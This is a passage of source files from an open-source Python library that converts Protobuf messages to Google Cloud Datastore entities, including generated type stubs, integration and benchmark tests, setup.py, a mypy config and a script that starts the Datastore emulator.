ClearField(self, field_name: typing_extensions___Literal[u\"struct_key\",b\"struct_key\"]) -> None: ...\n" }, { "alpha_fraction": 0.6423550248146057, "alphanum_fraction": 0.6524604558944702, "avg_line_length": 36.31147384643555, "blob_id": "ec72f50993def27f0cbcb3f5708854c0d970de69", "content_id": "e494b370fad53d52dcb3e532b3563d09e201c6aa", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2276, "license_type": "permissive", "max_line_length": 119, "num_lines": 61, "path": "/tests/generated/example2_pb2.pyi", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# @generated by generate_proto_mypy_stubs.py. Do not edit!\nimport sys\nfrom google.protobuf.descriptor import (\n Descriptor as google___protobuf___descriptor___Descriptor,\n EnumDescriptor as google___protobuf___descriptor___EnumDescriptor,\n)\n\nfrom google.protobuf.message import (\n Message as google___protobuf___message___Message,\n)\n\nfrom typing import (\n List as typing___List,\n Optional as typing___Optional,\n Text as typing___Text,\n Tuple as typing___Tuple,\n cast as typing___cast,\n)\n\nfrom typing_extensions import (\n Literal as typing_extensions___Literal,\n)\n\n\nclass ExampleReferencedEnum(int):\n DESCRIPTOR: google___protobuf___descriptor___EnumDescriptor = ...\n @classmethod\n def Name(cls, number: int) -> str: ...\n @classmethod\n def Value(cls, name: str) -> ExampleReferencedEnum: ...\n @classmethod\n def keys(cls) -> typing___List[str]: ...\n @classmethod\n def values(cls) -> typing___List[ExampleReferencedEnum]: ...\n @classmethod\n def items(cls) -> typing___List[typing___Tuple[str, ExampleReferencedEnum]]: ...\n KEY0 = typing___cast(ExampleReferencedEnum, 0)\n KEY1 = typing___cast(ExampleReferencedEnum, 1)\n KEY2 = typing___cast(ExampleReferencedEnum, 2)\nKEY0 = typing___cast(ExampleReferencedEnum, 0)\nKEY1 = typing___cast(ExampleReferencedEnum, 1)\nKEY2 = typing___cast(ExampleReferencedEnum, 2)\n\nclass ExampleReferencedType(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key_1 = ... # type: typing___Text\n key_2 = ... # type: typing___Text\n\n def __init__(self,\n *,\n key_1 : typing___Optional[typing___Text] = None,\n key_2 : typing___Optional[typing___Text] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleReferencedType: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"key_1\",u\"key_2\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"key_1\",b\"key_1\",u\"key_2\",b\"key_2\"]) -> None: ...\n" }, { "alpha_fraction": 0.7377049326896667, "alphanum_fraction": 0.7377049326896667, "avg_line_length": 29.5, "blob_id": "8d0fa9baa533dcbffa00877ce8fbefc66c764757", "content_id": "9366fd7842022cf8492917a2cfa91fccf413fe4d", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 366, "license_type": "permissive", "max_line_length": 81, "num_lines": 12, "path": "/tests/generated/models/options_pb2.pyi", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# @generated by generate_proto_mypy_stubs.py. Do not edit!\nimport sys\nfrom google.protobuf.descriptor import (\n FieldDescriptor as google___protobuf___descriptor___FieldDescriptor,\n)\n\nfrom google.protobuf.message import (\n Message as google___protobuf___message___Message,\n)\n\n\nexclude_from_index = ... # type: google___protobuf___descriptor___FieldDescriptor\n" }, { "alpha_fraction": 0.6163157224655151, "alphanum_fraction": 0.6185852885246277, "avg_line_length": 36.94736862182617, "blob_id": "819451bc2546d609a931a56e15e2413670b911ef", "content_id": "fbb560aa3f17c2abe52cc8f200f2f6b800687adb", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7931, "license_type": "permissive", "max_line_length": 97, "num_lines": 209, "path": "/tests/integration/test_cross_lang_compatibility.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import Dict\n\nimport os\nimport sys\nimport json\nimport uuid\nimport subprocess\n\nfrom tests.integration.base import BaseDatastoreIntegrationTestCase\n\n__all__ = [\n 'CrossLangCompatibilityIntegrationTestCase'\n]\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nFIXTURES_PATH = os.path.join(BASE_DIR, 'fixtures/')\n\nPYTHON_INSERT_GET_SCRIPT_PATH = os.path.join(BASE_DIR, 'python/python-put-get-db-model.py')\nGO_INSERT_GET_SCRIPT_PATH = os.path.join(BASE_DIR, 'go', 'go-put-get-db-model')\n\nGO_BINARY_DOESNT_EXIST_ERROR = \"\"\"\ngo-put-get-db-model binary doesn't exist. You can build it by running\n./scripts/build-go-binary.sh script.\n\"\"\".strip()\n\n\nclass CrossLangCompatibilityIntegrationTestCase(BaseDatastoreIntegrationTestCase):\n \"\"\"\n Integration test which verifies that the output by Python and Go translator\n library is exactly the same.\n \"\"\"\n\n maxDiff = None\n\n FIXTURES = [\n {\n 'path': os.path.join(FIXTURES_PATH, 'example_db_model_1.json'),\n 'key': str(uuid.uuid4()),\n 'entity_kind': 'ExampleCompatDBModel'\n }\n ]\n\n def setUp(self):\n # type: () -> None\n super(CrossLangCompatibilityIntegrationTestCase, self).setUp()\n\n # Verify go binary exists\n if not os.path.isfile(GO_INSERT_GET_SCRIPT_PATH):\n raise ValueError(GO_BINARY_DOESNT_EXIST_ERROR)\n\n # Load fixture content into memory\n for fixture_obj in self.FIXTURES:\n with open(fixture_obj['path'], 'r') as fp:\n fixture_obj['content'] = json.loads(fp.read())\n\n def test_put_and_get(self):\n # type: () -> None\n for fixture_obj in self.FIXTURES:\n self._test_fixture_obj(fixture_obj=fixture_obj)\n\n def _test_fixture_obj(self, fixture_obj):\n # type: (Dict[str, str]) -> None\n\n # Insert Protobuf model in the datastore using Python translator library\n self._python_insert_fixture(fixture_obj=fixture_obj)\n\n # Insert Protobuf model in the datastore using Go translator library\n self._go_insert_fixture(fixture_obj=fixture_obj)\n\n # Verify entity has been inserted\n key_python = self.client.key(fixture_obj['entity_kind'], 'python_' + fixture_obj['key'])\n key_go = self.client.key(fixture_obj['entity_kind'], 'go_' + fixture_obj['key'])\n\n entity_python_pb = self.client.get(key_python)\n entity_go_pb = self.client.get(key_go)\n\n self.assertTrue(entity_python_pb, 'Entity with key \"%s\" not found' % (key_python))\n self.assertTrue(entity_go_pb, 'Entity with key \"%s\" not found' % (key_go))\n\n # Reset keys since they will always be different\n entity_python_pb.key = None\n entity_go_pb.key = None\n\n # Compare the raw entity result\n msg = 'Translated Entity PB objects for Python and Go don\\'t match'\n self.assertEqual(entity_python_pb, entity_go_pb, msg)\n\n # Compare translated models\n\n # First perform a sanity test and make sure it matches the original fixture input\n model_pb_json_python = self._python_get_fixture(fixture_obj=fixture_obj)\n self.assertDictsEqualIgnoreMissingDefaultValues(model_pb_json_python,\n fixture_obj['content'])\n\n model_pb_json_go = self._go_get_fixture(fixture_obj=fixture_obj)\n self.assertDictsEqualIgnoreMissingDefaultValues(model_pb_json_go, fixture_obj['content'])\n\n # Now compare Python and Go versions and make sure they match\n self.assertDictsEqualIgnoreMissingDefaultValues(model_pb_json_python, model_pb_json_go)\n\n def assertDictsEqualIgnoreMissingDefaultValues(self, model_pb_python, model_pb_go):\n \"\"\"\n Custom assertion function which asserts that the provided Model PB returned by the Python\n translator library and the one returned by the Go one serialized as JSON are the same.\n\n NOTE: We need a custom assert functions because there are some differences between JSON\n <-> PB serialized in Python and Go and we use JSON as an intermediate format for our test\n fixtures.\n \"\"\"\n field_names = set(model_pb_python.keys())\n field_names.update(model_pb_go.keys())\n\n for field_name in field_names:\n # NOTE: Due to the JSON serializer differences there can be some default values\n # missing\n value_python = model_pb_python.get(field_name, None)\n value_go = model_pb_go.get(field_name, None)\n\n if not value_python and not value_go:\n value_python = None\n value_go = None\n\n msg = 'Field \"%s\" on Python and Go Model PB object didn\\'t match' % (field_name)\n self.assertEqual(value_python, value_go, msg)\n\n def _python_insert_fixture(self, fixture_obj):\n # type: (Dict[str, str]) -> None\n args = [\n sys.executable,\n PYTHON_INSERT_GET_SCRIPT_PATH,\n '--operation=put',\n '--fixture-path=%s' % (fixture_obj['path']),\n '--primary-key=python_%s' % (fixture_obj['key']),\n ]\n\n process = subprocess.Popen(args, shell=False, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n\n if process.returncode != 0:\n self.assertFalse('Failed to run command \"%s\": %s' % (args, stderr))\n\n def _go_insert_fixture(self, fixture_obj):\n # type: (Dict[str, str]) -> None\n args = [\n GO_INSERT_GET_SCRIPT_PATH,\n '-operation=put',\n '-fixture-path=%s' % (fixture_obj['path']),\n '-primary-key=go_%s' % (fixture_obj['key']),\n ]\n process = subprocess.Popen(args, shell=False, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n\n if process.returncode != 0:\n self.assertFalse('Failed to run command \"%s\": %s' % (args, stderr))\n\n def _python_get_fixture(self, fixture_obj):\n # type: (Dict[str, str]) -> Dict\n args = [\n sys.executable,\n PYTHON_INSERT_GET_SCRIPT_PATH,\n '--operation=get',\n '--primary-key=python_%s' % (fixture_obj['key']),\n ]\n process = subprocess.Popen(args, shell=False, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n\n if process.returncode != 0:\n self.assertFalse('Failed to run command \"%s\": %s' % (args, stderr))\n\n json_parsed = json.loads(stdout) # type: ignore\n\n return json_parsed\n\n def _go_get_fixture(self, fixture_obj):\n # type: (Dict[str, str]) -> Dict\n args = [\n GO_INSERT_GET_SCRIPT_PATH,\n '-operation=get',\n '-primary-key=go_%s' % (fixture_obj['key']),\n ]\n process = subprocess.Popen(args, shell=False, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, stderr = process.communicate()\n\n if process.returncode != 0:\n self.assertFalse('Failed to run command \"%s\": %s' % (args, stderr))\n\n json_parsed = json.loads(stdout)\n\n return json_parsed\n" }, { "alpha_fraction": 0.7176470756530762, "alphanum_fraction": 0.7347593307495117, "avg_line_length": 32.39285659790039, "blob_id": "2e80981caee4dc954f662cfd806fb7a576379338", "content_id": "4952a1cea48caa8c16293c7e514f8af73a96b24d", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 935, "license_type": "permissive", "max_line_length": 74, "num_lines": 28, "path": "/protobuf_cloud_datastore_translator/__init__.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\n\n__all__ = [\n 'model_pb_to_entity_pb',\n 'model_pb_with_key_to_entity_pb',\n 'entity_pb_to_model_pb'\n]\n\n__version__ = '0.1.14-dev'\n\nfrom .translator import model_pb_to_entity_pb\nfrom .translator import model_pb_with_key_to_entity_pb\nfrom .translator import entity_pb_to_model_pb\n" }, { "alpha_fraction": 0.6818554997444153, "alphanum_fraction": 0.697044312953949, "avg_line_length": 33.79999923706055, "blob_id": "6e9cf39f03c2c758ca8e79ad5e89904ac80401ac", "content_id": "ce9f5a9886b530c428cb046ba3810828f008af47", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2436, "license_type": "permissive", "max_line_length": 88, "num_lines": 70, "path": "/setup.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport codecs\nimport sys\nimport os.path\n\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nfrom dist_utils import fetch_requirements\nfrom dist_utils import parse_version_string\n\nPY2 = sys.version_info[0] == 2\nPY2_or_3_pre_34 = sys.version_info < (3, 4, 0)\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nREQUIREMENTS_FILE = os.path.join(BASE_DIR, 'requirements.txt')\nINIT_FILE = os.path.join(BASE_DIR, 'protobuf_cloud_datastore_translator', '__init__.py')\n\nversion = parse_version_string(INIT_FILE)\ninstall_reqs, dep_links = fetch_requirements(REQUIREMENTS_FILE)\n\nif PY2_or_3_pre_34:\n install_reqs.append('typing')\n\nwith codecs.open(os.path.join(BASE_DIR, 'README.md'), encoding='utf-8') as f:\n LONG_DESCRIPTION = f.read()\n\nsetup(\n name='protobuf-cloud-datastore-translator',\n version=version,\n description=('Library which converts arbitrary Protobuf message objects into '\n 'Entity Protobuf objects which can be used with Google Datastore.'),\n long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown',\n author='Tomaz Muraus',\n author_email='tomaz@tomaz.me',\n license='Apache License (2.0)',\n classifiers=[\n 'Intended Audience :: Information Technology',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n install_requires=install_reqs,\n dependency_links=dep_links,\n zip_safe=False,\n include_package_data=True,\n packages=find_packages(exclude=['setuptools', 'tests']),\n package_data={\n 'protobuf_cloud_datastore_translator': ['py.typed']\n }\n)\n" }, { "alpha_fraction": 0.6240977048873901, "alphanum_fraction": 0.636868417263031, "avg_line_length": 53.029998779296875, "blob_id": "b7c222b4581f8cd66b8fc3eb642a6e96dcf079eb", "content_id": "8fb71fa48336e036d1071bab6960a224a8fb5769", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5403, "license_type": "permissive", "max_line_length": 309, "num_lines": 100, "path": "/tests/generated/models/example_with_options_pb2.pyi", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# @generated by generate_proto_mypy_stubs.py. Do not edit!\nimport sys\nfrom google.protobuf.descriptor import (\n Descriptor as google___protobuf___descriptor___Descriptor,\n)\n\nfrom google.protobuf.message import (\n Message as google___protobuf___message___Message,\n)\n\nfrom typing import (\n Optional as typing___Optional,\n Text as typing___Text,\n)\n\nfrom typing_extensions import (\n Literal as typing_extensions___Literal,\n)\n\n\nclass ExampleDBModelWithOptions1(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key_one = ... # type: typing___Text\n string_key_two = ... # type: typing___Text\n string_key_three = ... # type: typing___Text\n string_key_four = ... # type: typing___Text\n int32_field_one = ... # type: int\n int32_field_two = ... # type: int\n\n def __init__(self,\n *,\n string_key_one : typing___Optional[typing___Text] = None,\n string_key_two : typing___Optional[typing___Text] = None,\n string_key_three : typing___Optional[typing___Text] = None,\n string_key_four : typing___Optional[typing___Text] = None,\n int32_field_one : typing___Optional[int] = None,\n int32_field_two : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModelWithOptions1: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",u\"int32_field_two\",u\"string_key_four\",u\"string_key_one\",u\"string_key_three\",u\"string_key_two\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",b\"int32_field_one\",u\"int32_field_two\",b\"int32_field_two\",u\"string_key_four\",b\"string_key_four\",u\"string_key_one\",b\"string_key_one\",u\"string_key_three\",b\"string_key_three\",u\"string_key_two\",b\"string_key_two\"]) -> None: ...\n\nclass ExampleDBModelWithOptions2(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key_one = ... # type: typing___Text\n string_key_two = ... # type: typing___Text\n string_key_three = ... # type: typing___Text\n string_key_four = ... # type: typing___Text\n int32_field_one = ... # type: int\n int32_field_two = ... # type: int\n\n def __init__(self,\n *,\n string_key_one : typing___Optional[typing___Text] = None,\n string_key_two : typing___Optional[typing___Text] = None,\n string_key_three : typing___Optional[typing___Text] = None,\n string_key_four : typing___Optional[typing___Text] = None,\n int32_field_one : typing___Optional[int] = None,\n int32_field_two : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModelWithOptions2: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",u\"int32_field_two\",u\"string_key_four\",u\"string_key_one\",u\"string_key_three\",u\"string_key_two\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",b\"int32_field_one\",u\"int32_field_two\",b\"int32_field_two\",u\"string_key_four\",b\"string_key_four\",u\"string_key_one\",b\"string_key_one\",u\"string_key_three\",b\"string_key_three\",u\"string_key_two\",b\"string_key_two\"]) -> None: ...\n\nclass ExampleDBModelWithOptions3(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key_one = ... # type: typing___Text\n string_key_two = ... # type: typing___Text\n string_key_three = ... # type: typing___Text\n string_key_four = ... # type: typing___Text\n int32_field_one = ... # type: int\n int32_field_two = ... # type: int\n\n def __init__(self,\n *,\n string_key_one : typing___Optional[typing___Text] = None,\n string_key_two : typing___Optional[typing___Text] = None,\n string_key_three : typing___Optional[typing___Text] = None,\n string_key_four : typing___Optional[typing___Text] = None,\n int32_field_one : typing___Optional[int] = None,\n int32_field_two : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModelWithOptions3: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",u\"int32_field_two\",u\"string_key_four\",u\"string_key_one\",u\"string_key_three\",u\"string_key_two\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_field_one\",b\"int32_field_one\",u\"int32_field_two\",b\"int32_field_two\",u\"string_key_four\",b\"string_key_four\",u\"string_key_one\",b\"string_key_one\",u\"string_key_three\",b\"string_key_three\",u\"string_key_two\",b\"string_key_two\"]) -> None: ...\n" }, { "alpha_fraction": 0.7520259022712708, "alphanum_fraction": 0.7552674412727356, "avg_line_length": 19.566667556762695, "blob_id": "648560ba64f29752a9001f05f4f16a1b91b86cd3", "content_id": "a33e606eab5c673d59123fd519935a2e2d00147a", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 617, "license_type": "permissive", "max_line_length": 77, "num_lines": 30, "path": "/lint-configs/mypy.ini", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "[mypy]\npython_version = 2.7\nplatform = linux\nshow_error_context = True\nshow_column_numbers = True\n\n# List of ignore files for packages and libraries which don't have type hints\n[mypy-google.type]\nignore_missing_imports = True\n\n[mypy-google.cloud.*]\nignore_missing_imports = True\n\n[mypy-google.protobuf.pyext.*]\nignore_missing_imports = True\n\n[mypy-google.api_core]\nignore_missing_imports = True\n\n[mypy-grpc.*]\nignore_missing_imports = True\n\n# Generated protobuf files\n[mypy-tests.mocks.*]\nignore_missing_imports = True\nignore_errors = True\n\n[mypy-tests.generated.*]\nignore_missing_imports = True\nignore_errors = True\n" }, { "alpha_fraction": 0.723787784576416, "alphanum_fraction": 0.739020049571991, "avg_line_length": 31.55371856689453, "blob_id": "c8cdd386665e42a0bff82b37017bc72fc337bc7b", "content_id": "35946954738dc4d9d54be128e7cd1c277d1fb8a9", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3939, "license_type": "permissive", "max_line_length": 96, "num_lines": 121, "path": "/tests/test_benchmarks.py", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\nimport pytest\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nsys.path.append(os.path.join(BASE_DIR, '../'))\nsys.path.append(os.path.join(BASE_DIR, '../tests/generated/'))\n\nfrom protobuf_cloud_datastore_translator import model_pb_to_entity_pb\nfrom protobuf_cloud_datastore_translator import entity_pb_to_model_pb\n\nfrom tests.generated import example_pb2\nfrom tests.mocks import EXAMPLE_PB_POPULATED\nfrom tests.mocks import EXAMPLE_PB_DEFAULT_VALUES\nfrom tests.mocks import EXAMPLE_PB_WITH_OPTIONS_1\n\n\ncomplex_example_pb = EXAMPLE_PB_POPULATED\ncomplex_entity_pb = model_pb_to_entity_pb(model_pb=complex_example_pb)\n\nsimple_example_pb = EXAMPLE_PB_DEFAULT_VALUES\nsimple_entity_pb = model_pb_to_entity_pb(model_pb=simple_example_pb)\n\n\ndef measure_model_pb_to_entity_pb_complex_model():\n return model_pb_to_entity_pb(model_pb=complex_example_pb)\n\n\ndef measure_entity_pb_to_model_pb_complex_model():\n return entity_pb_to_model_pb(example_pb2.ExampleDBModel, complex_entity_pb)\n\n\ndef measure_model_pb_to_entity_pb_simple_model():\n return model_pb_to_entity_pb(model_pb=simple_example_pb)\n\n\ndef measure_entity_pb_to_model_pb_simple_model():\n return entity_pb_to_model_pb(example_pb2.ExampleDBModel, simple_entity_pb)\n\n\ndef measure_model_pb_to_entity_pb_with_exclude_field_from_index_simple_model():\n return model_pb_to_entity_pb(model_pb=EXAMPLE_PB_WITH_OPTIONS_1)\n\n\n@pytest.mark.benchmark(\n group='model_pb_to_entity_pb',\n disable_gc=True,\n warmup=False\n)\ndef test_model_pb_to_entity_pb_complex_model(benchmark):\n # benchmark something\n result = benchmark(measure_model_pb_to_entity_pb_complex_model)\n assert bool(result)\n assert result.properties['int32_key'].integer_value == 100\n\n\n@pytest.mark.benchmark(\n group='model_pb_to_entity_pb',\n disable_gc=True,\n warmup=False\n)\ndef test_model_pb_to_entity_pb_simple_model(benchmark):\n # benchmark something\n result = benchmark(measure_model_pb_to_entity_pb_simple_model)\n assert bool(result)\n assert result.properties['int32_key'].integer_value == 0\n\n\n@pytest.mark.benchmark(\n group='model_pb_to_entity_pb',\n disable_gc=True,\n warmup=False\n)\ndef test_model_pb_to_entity_pb_with_exclude_field_from_index_simple_model(benchmark):\n # benchmark something\n result = benchmark(measure_model_pb_to_entity_pb_with_exclude_field_from_index_simple_model)\n assert bool(result)\n assert result.properties['int32_field_one'].integer_value == 100000000\n assert result.properties['int32_field_one'].exclude_from_indexes is False\n assert result.properties['int32_field_two'].integer_value == 200000000\n assert result.properties['int32_field_two'].exclude_from_indexes is True\n\n\n@pytest.mark.benchmark(\n group='entity_pb_to_model_pb',\n disable_gc=True,\n warmup=False\n)\ndef test_entity_pb_to_model_pb_complex_entity(benchmark):\n result = benchmark(measure_entity_pb_to_model_pb_complex_model)\n assert bool(result)\n assert result.int32_key == 100\n\n\n@pytest.mark.benchmark(\n group='entity_pb_to_model_pb',\n disable_gc=True,\n warmup=False\n)\ndef test_entity_pb_to_model_pb_simple_entity(benchmark):\n result = benchmark(measure_entity_pb_to_model_pb_simple_model)\n assert bool(result)\n assert result.int32_key == 0\n" }, { "alpha_fraction": 0.7843137383460999, "alphanum_fraction": 0.843137264251709, "avg_line_length": 9.199999809265137, "blob_id": "3a1be125e01841a810556fb7ac6e86183a8576bf", "content_id": "da7fe9990f5acf170ce2fb486b0b1b9e731d5f64", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 102, "license_type": "permissive", "max_line_length": 16, "num_lines": 10, "path": "/requirements-test.txt", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "pylint\nflake8\nst2flake8==0.1.0\ncoverage\ncodecov\nrequests\npytest\npytest-coverage\npytest-benchmark\nmock\n" }, { "alpha_fraction": 0.7219973206520081, "alphanum_fraction": 0.741565465927124, "avg_line_length": 37, "blob_id": "a68e5fdefcecb72e9a0a61f45551199450193641", "content_id": "a77bf52b704ac13165c8a6b9ee477382080b730c", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1482, "license_type": "permissive", "max_line_length": 128, "num_lines": 39, "path": "/scripts/run-datastore-emulator.sh", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# Copyright 2019 Tomaz Muraus\n# Copyright 2019 Extreme Networks, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Script which installs and starts Google Cloud Datastore Emulator\n\n# Install Cloud SDK\nexport CLOUD_SDK_REPO=\"cloud-sdk-$(lsb_release -c -s)\"\necho \"deb http://packages.cloud.google.com/apt $CLOUD_SDK_REPO main\" | sudo tee -a /etc/apt/sources.list.d/google-cloud-sdk.list\ncurl https://packages.cloud.google.com/apt/doc/apt-key.gpg | sudo apt-key add -\nsudo apt-get update && sudo apt-get install google-cloud-sdk google-cloud-sdk-datastore-emulator\n\ngcloud beta emulators datastore start --host-port=127.0.0.1:8081 --no-store-on-disk &> /tmp/emulator.log &\nEMULATOR_PID=$!\n\n# Give process some time to start up\nsleep 5\n\nif ps -p ${EMULATOR_PID} > /dev/null; then\n echo \"Datastore emulator successfully started\"\n tail -30 /tmp/emulator.log\n exit 0\nelse\n echo \"Failed to start Datastore emulator\"\n tail -30 /tmp/emulator.log\n exit 1\nfi\n" }, { "alpha_fraction": 0.6266375780105591, "alphanum_fraction": 0.636826753616333, "avg_line_length": 48.36526870727539, "blob_id": "be58a9e057cde469ddf5cb4dafeb98d642d025e3", "content_id": "f255b84618c73d6baa4bf8f12532f6dc1ec342d2", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8244, "license_type": "permissive", "max_line_length": 487, "num_lines": 167, "path": "/tests/generated/compat/example_compat_pb2.pyi", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# @generated by generate_proto_mypy_stubs.py. Do not edit!\nimport sys\nfrom google.protobuf.descriptor import (\n Descriptor as google___protobuf___descriptor___Descriptor,\n EnumDescriptor as google___protobuf___descriptor___EnumDescriptor,\n)\n\nfrom google.protobuf.internal.containers import (\n RepeatedScalarFieldContainer as google___protobuf___internal___containers___RepeatedScalarFieldContainer,\n)\n\nfrom google.protobuf.message import (\n Message as google___protobuf___message___Message,\n)\n\nfrom google.protobuf.struct_pb2 import (\n Struct as google___protobuf___struct_pb2___Struct,\n)\n\nfrom google.protobuf.timestamp_pb2 import (\n Timestamp as google___protobuf___timestamp_pb2___Timestamp,\n)\n\nfrom typing import (\n 